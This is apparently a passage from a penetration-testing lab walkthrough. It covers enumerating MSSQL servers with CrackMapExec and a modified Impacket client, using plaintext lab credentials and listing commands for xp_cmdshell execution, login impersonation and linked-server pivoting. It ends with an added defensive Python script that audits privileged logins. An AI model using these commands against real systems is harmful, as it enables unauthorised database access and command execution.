Enumerate MSSQL servers with CrackMap & Impacket
CrackMapExec
Let’s try with crackmapexec
crackmapexec mssql 192.168.56.22-23

Now we could try with the user miguel.ortiz
crackmapexec mssql 192.168.56.22 -u miguel.cabrera -p ilovebaseball -d north.newyork.local
As we can see, we got access to the database.
Impacket
To enumerate and use impacket mssql, I made a modified version of the example mssqlclient.py.
You can find the version here
The install is just like what we did in part 5: merge the PR on your local impacket project and relaunch the install:
cd /opt/tools
git clone https://github.com/SecureAuthCorp/impacket myimpacket
cd myimpacket
python3 -m virtualenv myimpacket
source myimpacket/bin/activate
git fetch origin pull/1397/head:1397
git merge 1397
python3 -m pip install .
We connect to the mssql server with the following command:
mssqlclient.py -windows-auth north.newyork.local/miguel.cabrera:ilovebaseball@yonkers.north.newyork.local
And type help:
lcd {path} - changes the current local directory to {path}
exit - terminates the server process (and this session)
enable_xp_cmdshell - you know what it means
disable_xp_cmdshell - you know what it means
enum_db - enum databases
enum_links - enum linked servers
enum_impersonate - check logins that can be impersonate
enum_logins - enum login users
enum_users - enum current db users
enum_owner - enum db owner
exec_as_user {user} - impersonate with execute as user
exec_as_login {login} - impersonate with execute as login
xp_cmdshell {cmd} - executes cmd using xp_cmdshell
xp_dirtree {path} - executes xp_dirtree on the path
sp_start_job {cmd} - executes cmd using the sql server agent (blind)
use_link {link} - linked server to use (set use_link localhost to go back to local or use_link .. to get back one step)
! {cmd} - executes a local shell cmd
show_query - show query
mask_query - mask query
I added the following new commands to the client: enum_db/enum_links/enum_impersonate/enum_logins/enum_owner/exec_as_user/exec_as_login/use_link/show_query/mask_query
Let's start the enumeration:
enum_logins
This launches the following query (the meaning of the role values can be found here):
select r.name,r.type_desc,r.is_disabled, sl.sysadmin, sl.securityadmin,
sl.serveradmin, sl.setupadmin, sl.processadmin, sl.diskadmin, sl.dbcreator, sl.bulkadmin
from master.sys.server_principals r
left join master.sys.syslogins sl on sl.sid = r.sid
where r.type in ('S','E','X','U','G')
We only see a basic view, since we are a simple user.
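As an added example (not from this post and not part of Impacket), the script below takes rows in the same column order this query returns and lists the enabled principals that hold server-level roles, which is the view you want when auditing an instance rather than just reading the raw table. The sample rows are constructed, and the account and group names in them are invented for illustration.

```python
"""Audit rows returned by the enum_logins query
(master.sys.server_principals joined to master.sys.syslogins)."""
from dataclasses import dataclass

# Role flag columns, in the order the query selects them from syslogins.
ROLE_COLUMNS = ("sysadmin", "securityadmin", "serveradmin", "setupadmin",
                "processadmin", "diskadmin", "dbcreator", "bulkadmin")
# Roles that effectively give full control of the instance.
HIGH_RISK_ROLES = {"sysadmin", "securityadmin"}


@dataclass
class Login:
    name: str
    type_desc: str        # r.type_desc, e.g. SQL_LOGIN / WINDOWS_LOGIN / WINDOWS_GROUP
    is_disabled: bool
    roles: dict           # role name -> 1/0 as returned by syslogins


def parse_row(row):
    """Turn one result tuple (query column order) into a Login."""
    name, type_desc, is_disabled, *flags = row
    return Login(name, type_desc, bool(is_disabled), dict(zip(ROLE_COLUMNS, flags)))


def audit(rows):
    """Return enabled principals that hold at least one server role,
    high-risk ones (sysadmin/securityadmin) first, then by name."""
    findings = []
    for login in map(parse_row, rows):
        held = [r for r in ROLE_COLUMNS if login.roles.get(r)]
        if login.is_disabled or not held:
            continue
        findings.append({
            "name": login.name,
            "type_desc": login.type_desc,
            "roles": held,
            "high_risk": bool(HIGH_RISK_ROLES & set(held)),
        })
    findings.sort(key=lambda f: (not f["high_risk"], f["name"]))
    return findings


# Constructed sample rows: name, type_desc, is_disabled, then the eight role flags.
SAMPLE_ROWS = [
    ("sa", "SQL_LOGIN", 1, 1, 0, 0, 0, 0, 0, 0, 0),
    ("LAB\\some.user", "WINDOWS_LOGIN", 0, 0, 0, 0, 0, 0, 0, 0, 0),
    ("LAB\\Domain Admins", "WINDOWS_GROUP", 0, 1, 0, 0, 0, 0, 0, 0, 0),
    ("backup_svc", "SQL_LOGIN", 0, 0, 0, 0, 0, 0, 0, 1, 1),
]

if __name__ == "__main__":
    for finding in audit(SAMPLE_ROWS):
        print(finding)
```

A disabled sa is skipped on purpose: the point is who can act on the server now, so disabled principals are filtered before roles are examined.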